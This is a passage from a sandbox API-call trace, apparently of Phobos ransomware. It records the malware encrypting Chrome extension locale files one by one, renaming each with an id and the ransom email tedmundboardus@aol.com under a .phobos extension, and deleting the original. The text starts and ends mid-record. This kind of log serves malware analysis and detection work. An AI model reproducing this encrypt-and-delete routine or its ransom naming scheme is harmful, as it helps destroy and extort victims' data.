lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.648] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.648] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.648] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11e, lpOverlapped=0x0) returned 1 [0154.648] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0154.649] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0154.649] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.649] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.649] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.649] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.649] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.650] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.650] CloseHandle (hObject=0x194) returned 1 [0154.650] CloseHandle (hObject=0x18c) returned 1 [0154.650] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json")) returned 1 [0154.654] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.655] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=318) returned 1 [0154.655] CloseHandle (hObject=0x18c) returned 1 [0154.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json")) returned 0x2020 [0154.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.655] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.655] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.656] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.656] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.656] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x13e, lpOverlapped=0x0) returned 1 [0154.657] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140, dwBufLen=0x140 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x140) returned 1 [0154.657] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x140, lpOverlapped=0x0) returned 1 [0154.657] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.657] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.657] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.657] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.657] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.658] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.658] CloseHandle (hObject=0x18c) returned 1 [0154.658] CloseHandle (hObject=0x194) returned 1 [0154.658] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json")) returned 1 [0154.660] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.660] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=200) returned 1 [0154.660] CloseHandle (hObject=0x194) returned 1 [0154.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json")) returned 0x2020 [0154.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.661] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.661] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.661] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.661] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.661] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc8, lpOverlapped=0x0) returned 1 [0154.662] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0154.662] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0154.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.663] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.663] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.663] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.663] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.663] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.663] CloseHandle (hObject=0x194) returned 1 [0154.663] CloseHandle (hObject=0x18c) returned 1 [0154.663] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\messages.json")) returned 1 [0154.665] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.666] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=198) returned 1 [0154.666] CloseHandle (hObject=0x18c) returned 1 [0154.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json")) returned 0x2020 [0154.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.666] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.666] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.666] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0154.666] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.667] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc6, lpOverlapped=0x0) returned 1 [0154.667] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0154.667] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0154.668] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0154.668] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.668] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.668] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.668] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.668] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.668] CloseHandle (hObject=0x18c) returned 1 [0154.668] CloseHandle (hObject=0x194) returned 1 [0154.669] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\messages.json")) returned 1 [0154.713] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.713] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=665) returned 1 [0154.714] CloseHandle (hObject=0x138) returned 1 [0154.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json")) returned 0x2020 [0154.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.714] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.714] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.714] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.714] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.714] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x299, lpOverlapped=0x0) returned 1 [0154.813] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2a0) returned 1 [0154.813] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2a0, lpOverlapped=0x0) returned 1 [0154.814] CryptImportKey (in: 